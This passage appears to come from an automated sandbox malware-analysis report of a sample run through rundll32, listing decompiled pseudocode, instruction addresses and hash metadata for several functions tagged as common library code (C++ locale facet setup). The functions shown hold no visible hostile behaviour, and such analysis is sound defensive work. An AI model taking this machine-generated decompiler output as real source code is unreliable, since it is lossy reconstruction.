				 *0x20681c28 = _t79;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
			}



















                0x215205da194
                0x215205da19c
                0x215205da1a5
                0x215205da1aa
                0x215205da1b4
                0x215205da1ba
                0x215205da1c1
                0x215205da1c6
                0x215205da1d0
                0x215205da1d9
                0x215205da1de
                0x215205da1e5
                0x215205da1e7
                0x215205da1ef
                0x215205da1f7
                0x215205da203
                0x215205da208
                0x215205da20f
                0x215205da217
                0x215205da219
                0x215205da221
                0x215205da228
                0x215205da232
                0x215205da234
                0x215205da23d
                0x215205da23f
                0x215205da247
                0x215205da24e
                0x215205da253
                0x215205da258
                0x215205da262
                0x215205da26b
                0x215205da272
                0x215205da283
                0x215205da288
                0x215205da289
                0x215205da28e
                0x215205da29f
                0x215205da2a7
                0x215205da2cb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: 3c03136164760f7e1a6a07b6b4258b87c4cc0a42b8b06979b908849f69dc63f8
                • Instruction ID: 05c9a7488ccb59fed046eaa66e64e57450ee5fe3fc257c83733e4f57021ad2a0
                • Opcode Fuzzy Hash: 3c03136164760f7e1a6a07b6b4258b87c4cc0a42b8b06979b908849f69dc63f8
                • Instruction Fuzzy Hash: 6D314037306E24C1EB219B26E5582D96365EBF47E0F180252AE6D077EDDE34D443C704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA2CC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205DA2CC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed long long _t58;
				intOrPtr _t65;
				intOrPtr* _t79;
				long long _t80;
				void* _t81;

				_t52 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t81 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t80 =  *0x20681bc8; // 0x0
				_a24 = _t80;
				_t57 =  *0x20681b18; // 0x0
				if (_t57 != 0) goto 0x205da347;
				E00000215215205D19DC(0,  &_a8);
				_t44 =  *0x20681b18 - _t57; // 0x0
				if (_t44 != 0) goto 0x205da336;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b18 = _t52;
				_t29 = E00000215215205D1A5C(_t52,  &_a8);
				_t58 =  *0x20681b18; // 0x0
				_t65 = _a8;
				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da35b;
				_t53 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0x205da35d;
				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da3ea;
				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da383;
				E00000215215205D6CC0(_t29);
				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da381;
				_t54 =  *((intOrPtr*)(_t53 + 0x10));
				goto 0x205da383;
				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da3ea;
				if (_t80 == 0) goto 0x205da392;
				goto 0x205da3ea;
				E00000215215205DCB7C(_t37, 0, 0, _t58,  &_a24, _t81);
				if (_t54 != 0xffffffff) goto 0x205da3c1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
				asm("int3");
				_t79 = _a24;
				 *0x20681bc8 = _t79;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t79 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t54, _t79),  &_a16);
			}



















                0x215205da2cc
                0x215205da2d4
                0x215205da2dd
                0x215205da2e2
                0x215205da2ec
                0x215205da2f2
                0x215205da2f9
                0x215205da2fe
                0x215205da308
                0x215205da311
                0x215205da316
                0x215205da31d
                0x215205da31f
                0x215205da327
                0x215205da32f
                0x215205da33b
                0x215205da340
                0x215205da347
                0x215205da34f
                0x215205da351
                0x215205da359
                0x215205da360
                0x215205da36a
                0x215205da36c
                0x215205da375
                0x215205da377
                0x215205da37f
                0x215205da386
                0x215205da38b
                0x215205da390
                0x215205da39a
                0x215205da3a3
                0x215205da3aa
                0x215205da3bb
                0x215205da3c0
                0x215205da3c1
                0x215205da3c6
                0x215205da3d7
                0x215205da3df
                0x215205da403

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: 8c6d8c65838e434312b1dd17bed9b4d444905f78ac3e8ceab61c4f28e1fcc8c0
                • Instruction ID: 8c49fba2907fa207f20ecf74cd9e05385cb6ebdaf651dc98bd2f7fdce4906954
                • Opcode Fuzzy Hash: 8c6d8c65838e434312b1dd17bed9b4d444905f78ac3e8ceab61c4f28e1fcc8c0
                • Instruction Fuzzy Hash: 85314D33706E60C1EB219B25E5582EA6365EBE47E0F280693EE6D077EDDA38D4438740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EE634 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205EE634(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t35;
				void* _t42;
				void* _t43;
				void* _t45;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				signed long long _t59;
				intOrPtr _t66;
				intOrPtr* _t80;
				long long _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t53 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t82 = __rcx;
				_t3 =  &_a16; // 0x89
				E00000215215205D19DC(0, _t3);
				_t81 =  *0x20681cb8; // 0x0
				_a24 = _t81;
				_t58 =  *0x20681c78; // 0x0
				if (_t58 != 0) goto 0x205ee6af;
				_t5 =  &_a8; // 0x81
				E00000215215205D19DC(0, _t5);
				_t45 =  *0x20681c78 - _t58; // 0x0
				if (_t45 != 0) goto 0x205ee69e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681c78 = _t53;
				_t6 =  &_a8; // 0x81
				_t29 = E00000215215205D1A5C(_t53, _t6);
				_t59 =  *0x20681c78; // 0x0
				_t66 = _a8;
				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205ee6c3;
				_t54 =  *((intOrPtr*)(_t66 + 0x10));
				goto 0x205ee6c5;
				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205ee752;
				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205ee6eb;
				E00000215215205D6CC0(_t29);
				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205ee6e9;
				_t55 =  *((intOrPtr*)(_t54 + 0x10));
				goto 0x205ee6eb;
				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205ee752;
				if (_t81 == 0) goto 0x205ee6fa;
				goto 0x205ee752;
				_t17 =  &_a24; // 0x91
				E00000215215205EF154(0, _t42, _t43, _t59, _t17, _t82, _t83, _t84);
				if (_t55 != 0xffffffff) goto 0x205ee729;
				_t18 =  &_v48; // 0x49
				E00000215215205B7290(_t18);
				_t19 =  &_v48; // 0x49
				E00000215215205F9940(_t59, _t19, 0x2066bb90, _t81);
				asm("int3");
				_t80 = _a24;
				 *0x20681cb8 = _t80;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
				_t35 = E00000215215205D6C88(_t55, _t80);
				_t22 =  &_a16; // 0x89
				return E00000215215205D1A5C(_t35, _t22);
			}























                0x215205ee634
                0x215205ee63c
                0x215205ee645
                0x215205ee64a
                0x215205ee64f
                0x215205ee654
                0x215205ee65a
                0x215205ee661
                0x215205ee666
                0x215205ee670
                0x215205ee674
                0x215205ee679
                0x215205ee67e
                0x215205ee685
                0x215205ee687
                0x215205ee68f
                0x215205ee697
                0x215205ee69e
                0x215205ee6a3
                0x215205ee6a8
                0x215205ee6af
                0x215205ee6b7
                0x215205ee6b9
                0x215205ee6c1
                0x215205ee6c8
                0x215205ee6d2
                0x215205ee6d4
                0x215205ee6dd
                0x215205ee6df
                0x215205ee6e7
                0x215205ee6ee
                0x215205ee6f3
                0x215205ee6f8
                0x215205ee6fd
                0x215205ee702
                0x215205ee70b
                0x215205ee70d
                0x215205ee712
                0x215205ee71e
                0x215205ee723
                0x215205ee728
                0x215205ee729
                0x215205ee72e
                0x215205ee73f
                0x215205ee747
                0x215205ee74c
                0x215205ee752
                0x215205ee76b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: dddffc8b7cee0c45d7b2c82b55984052fbcaf387caf02f0191d34294617ed4b0
                • Instruction ID: 54227492bcf1d1bd3394f9e4e437001dd0b331ae0860e2a9519ebbd76711b13c
                • Opcode Fuzzy Hash: dddffc8b7cee0c45d7b2c82b55984052fbcaf387caf02f0191d34294617ed4b0
                • Instruction Fuzzy Hash: DA314137316E60C1FB219B2AE5582D96365EFF47E0F280292AE9D477EDDE38D4468700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EE76C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205EE76C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681cc0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681c80; // 0x0
				if (_t56 != 0) goto 0x205ee7e7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681c80 - _t56; // 0x0
				if (_t43 != 0) goto 0x205ee7d6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681c80 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681c80; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205ee7fb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205ee7fd;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205ee88a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205ee823;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205ee821;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205ee823;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205ee88a;
				if (_t79 == 0) goto 0x205ee832;
				goto 0x205ee88a;
				E00000215215205EF274(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205ee861;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681cc0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205ee76c
                0x215205ee774
                0x215205ee77d
                0x215205ee782
                0x215205ee78c
                0x215205ee792
                0x215205ee799
                0x215205ee79e
                0x215205ee7a8
                0x215205ee7b1
                0x215205ee7b6
                0x215205ee7bd
                0x215205ee7bf
                0x215205ee7c7
                0x215205ee7cf
                0x215205ee7db
                0x215205ee7e0
                0x215205ee7e7
                0x215205ee7ef
                0x215205ee7f1
                0x215205ee7f9
                0x215205ee800
                0x215205ee80a
                0x215205ee80c
                0x215205ee815
                0x215205ee817
                0x215205ee81f
                0x215205ee826
                0x215205ee82b
                0x215205ee830
                0x215205ee83a
                0x215205ee843
                0x215205ee84a
                0x215205ee85b
                0x215205ee860
                0x215205ee861
                0x215205ee866
                0x215205ee877
                0x215205ee87f
                0x215205ee8a3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 75da1a24ee7ea4be0de446dfb2491d38a5f2297417b12a687ceb8dbe9b95a44d
                • Instruction ID: 9a03beaf9d698d3bb31dea69a2498452c66b33f84a20af301a5ccd86a1b28a21
                • Opcode Fuzzy Hash: 75da1a24ee7ea4be0de446dfb2491d38a5f2297417b12a687ceb8dbe9b95a44d
                • Instruction Fuzzy Hash: A9319E37356E60C1EB249B15E9582E96360EBF47E0F280292EE9D077EDDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EE8A4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205EE8A4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681cc8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681c88; // 0x0
				if (_t56 != 0) goto 0x205ee91f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681c88 - _t56; // 0x0
				if (_t43 != 0) goto 0x205ee90e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681c88 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681c88; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205ee933;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205ee935;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205ee9c2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205ee95b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205ee959;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205ee95b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205ee9c2;
				if (_t79 == 0) goto 0x205ee96a;
				goto 0x205ee9c2;
				E00000215215205EF338(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205ee999;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681cc8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205ee8a4
                0x215205ee8ac
                0x215205ee8b5
                0x215205ee8ba
                0x215205ee8c4
                0x215205ee8ca
                0x215205ee8d1
                0x215205ee8d6
                0x215205ee8e0
                0x215205ee8e9
                0x215205ee8ee
                0x215205ee8f5
                0x215205ee8f7
                0x215205ee8ff
                0x215205ee907
                0x215205ee913
                0x215205ee918
                0x215205ee91f
                0x215205ee927
                0x215205ee929
                0x215205ee931
                0x215205ee938
                0x215205ee942
                0x215205ee944
                0x215205ee94d
                0x215205ee94f
                0x215205ee957
                0x215205ee95e
                0x215205ee963
                0x215205ee968
                0x215205ee972
                0x215205ee97b
                0x215205ee982
                0x215205ee993
                0x215205ee998
                0x215205ee999
                0x215205ee99e
                0x215205ee9af
                0x215205ee9b7
                0x215205ee9db

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 2876089e10c2d968e4b2043cd1299fec1bbcb9083603dd03a7c8325768136a48
                • Instruction ID: 1992142f654de9991cc5df5c84bafdc19ce02437321f1859908ef5a0f7665bce
                • Opcode Fuzzy Hash: 2876089e10c2d968e4b2043cd1299fec1bbcb9083603dd03a7c8325768136a48
                • Instruction Fuzzy Hash: 09314333356E20C1EB61DB16E5582D963A5EFE4BE0F280252DEAD477EEDE38D4468700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EE9DC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205EE9DC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681cd0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681c90; // 0x0
				if (_t56 != 0) goto 0x205eea57;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681c90 - _t56; // 0x0
				if (_t43 != 0) goto 0x205eea46;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681c90 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681c90; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eea6b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205eea6d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eeafa;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eea93;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eea91;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205eea93;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eeafa;
				if (_t79 == 0) goto 0x205eeaa2;
				goto 0x205eeafa;
				E00000215215205EF3FC(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205eead1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681cd0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205ee9dc
                0x215205ee9e4
                0x215205ee9ed
                0x215205ee9f2
                0x215205ee9fc
                0x215205eea02
                0x215205eea09
                0x215205eea0e
                0x215205eea18
                0x215205eea21
                0x215205eea26
                0x215205eea2d
                0x215205eea2f
                0x215205eea37
                0x215205eea3f
                0x215205eea4b
                0x215205eea50
                0x215205eea57
                0x215205eea5f
                0x215205eea61
                0x215205eea69
                0x215205eea70
                0x215205eea7a
                0x215205eea7c
                0x215205eea85
                0x215205eea87
                0x215205eea8f
                0x215205eea96
                0x215205eea9b
                0x215205eeaa0
                0x215205eeaaa
                0x215205eeab3
                0x215205eeaba
                0x215205eeacb
                0x215205eead0
                0x215205eead1
                0x215205eead6
                0x215205eeae7
                0x215205eeaef
                0x215205eeb13

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 877f2c0cd03a4cd06c5b2f01244cafccef2e8701e5ca348bb27c9845a8b59d70
                • Instruction ID: b4be7d3a233f56fd23d81b3d75b1a23509848cd2521408bc543f6a2d054d81a6
                • Opcode Fuzzy Hash: 877f2c0cd03a4cd06c5b2f01244cafccef2e8701e5ca348bb27c9845a8b59d70
                • Instruction Fuzzy Hash: 56318F33356E20C1EA209B15E5582E96365FBF4BE4F1802A6DEAD077EDDF38D4568700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205EEB14 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205EEB14(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681ce0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681ca0; // 0x0
				if (_t56 != 0) goto 0x205eeb8f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681ca0 - _t56; // 0x0
				if (_t43 != 0) goto 0x205eeb7e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681ca0 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681ca0; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eeba3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205eeba5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eec32;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eebcb;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eebc9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205eebcb;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eec32;
				if (_t79 == 0) goto 0x205eebda;
				goto 0x205eec32;
				E00000215215205EF4C0(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205eec09;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681ce0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205eeb14
                0x215205eeb1c
                0x215205eeb25
                0x215205eeb2a
                0x215205eeb34
                0x215205eeb3a
                0x215205eeb41
                0x215205eeb46
                0x215205eeb50
                0x215205eeb59
                0x215205eeb5e
                0x215205eeb65
                0x215205eeb67
                0x215205eeb6f
                0x215205eeb77
                0x215205eeb83
                0x215205eeb88
                0x215205eeb8f
                0x215205eeb97
                0x215205eeb99
                0x215205eeba1
                0x215205eeba8
                0x215205eebb2
                0x215205eebb4
                0x215205eebbd
                0x215205eebbf
                0x215205eebc7
                0x215205eebce
                0x215205eebd3
                0x215205eebd8
                0x215205eebe2
                0x215205eebeb
                0x215205eebf2
                0x215205eec03
                0x215205eec08
                0x215205eec09
                0x215205eec0e
                0x215205eec1f
                0x215205eec27
                0x215205eec4b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 7ed25d9783e5947a0e337c2ae12d66896172e224ed6d274b60e8faa8946382e9
                • Instruction ID: 5f9871e4bae441212b174d8573158b70285def908168235ae5f4c6a7a267c043
                • Opcode Fuzzy Hash: 7ed25d9783e5947a0e337c2ae12d66896172e224ed6d274b60e8faa8946382e9
                • Instruction Fuzzy Hash: 06317E33716E24C1EA219B25E4582E96364EFE47E0F680292DE9D077EDDF38D852C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D8BA4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D8BA4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				void* _t43;
				void* _t45;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				signed long long _t59;
				intOrPtr _t66;
				intOrPtr* _t80;
				long long _t81;
				void* _t82;
				void* _t83;

				_t53 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t82 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t81 =  *0x20681c30; // 0x0
				_a24 = _t81;
				_t58 =  *0x20681b70; // 0x0
				if (_t58 != 0) goto 0x205d8c1f;
				E00000215215205D19DC(0,  &_a8);
				_t45 =  *0x20681b70 - _t58; // 0x0
				if (_t45 != 0) goto 0x205d8c0e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b70 = _t53;
				_t29 = E00000215215205D1A5C(_t53,  &_a8);
				_t59 =  *0x20681b70; // 0x0
				_t66 = _a8;
				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205d8c33;
				_t54 =  *((intOrPtr*)(_t66 + 0x10));
				goto 0x205d8c35;
				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205d8cc2;
				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205d8c5b;
				E00000215215205D6CC0(_t29);
				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205d8c59;
				_t55 =  *((intOrPtr*)(_t54 + 0x10));
				goto 0x205d8c5b;
				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205d8cc2;
				if (_t81 == 0) goto 0x205d8c6a;
				goto 0x205d8cc2;
				E00000215215205DBB20(0, _t42, _t43, _t59,  &_a24, _t82, _t83);
				if (_t55 != 0xffffffff) goto 0x205d8c99;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t59,  &_v48, 0x2066bb90, _t81);
				asm("int3");
				_t80 = _a24;
				 *0x20681c30 = _t80;
				0x205f5ad4();
